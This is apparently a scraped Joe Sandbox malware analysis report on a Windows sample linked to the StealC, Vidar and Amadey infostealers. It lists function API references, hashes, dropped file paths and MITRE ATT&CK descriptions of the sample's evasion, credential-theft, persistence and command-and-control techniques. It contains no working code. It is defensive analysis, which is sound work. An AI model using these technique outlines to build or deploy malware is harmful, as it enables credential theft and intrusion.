Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 8ef97570376d8511702c7e51dadbe8286e3fcbd0a033f4ee173b7643323278b6
Instruction ID: 0d51d961aa945228d64425b2406df66ac0adb469ee2ea8ba8b2c42c5496846af
Opcode Fuzzy Hash: 8ef97570376d8511702c7e51dadbe8286e3fcbd0a033f4ee173b7643323278b6
Instruction Fuzzy Hash: 83D0127270434565C52166979C45B96B7BCC7C327EF20883BE10841D104BA950DAD2AD

Function 6C700DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C700DF5
TlsGetValue.KERNEL32 ref: 6C700E2D
TlsGetValue.KERNEL32 ref: 6C700E58
TlsGetValue.KERNEL32 ref: 6C700E84

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: a1ffcfb770d7e0dbba0edebdb8da07b46cfa2fd22addacf352aedd956b0d2749
Instruction ID: 4191cf0f1b1c8ccbc447f8f45b21e2ef8e32e0171e5fce6aefd4c8f068f64cd3
Opcode Fuzzy Hash: a1ffcfb770d7e0dbba0edebdb8da07b46cfa2fd22addacf352aedd956b0d2749
Instruction Fuzzy Hash: 5531AEF17453858BDB107F388A8466977ECBF0A328F11467DD8989BA11EB349485CB86

Function 6C700F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C6A2AF5,?,?,?,?,?,6C6A0A1B,00000000), ref: 6C700F1A
malloc.MOZGLUE(00000001), ref: 6C700F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C700F42
TlsGetValue.KERNEL32 ref: 6C700F5B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 899334d2bf019e2fd5fa77bffee3e7dd6ba13fe4e4325f556fdaee567876e443
Instruction ID: 02f694efaa591388bbc20a0e37b8ce44ba7e9f88f5a55b2bc27dfe6e3ff48a42
Opcode Fuzzy Hash: 899334d2bf019e2fd5fa77bffee3e7dd6ba13fe4e4325f556fdaee567876e443
Instruction Fuzzy Hash: 2E01F5F1B012805BE7202F3A9E489527BECEF422B9F000175E91C82A21E730E805D3E2

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AKECBFBAEBKJJJJKFCGCBKKEHD

C:\ProgramData\BGIJDGCA

C:\ProgramData\CBGCAFIIECBFIDHIJKFBAKEGDG

C:\ProgramData\CFHIIEHJKKECGCBFIIJD

C:\ProgramData\CFIIIJJKJKFHIDGDBAKJ

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre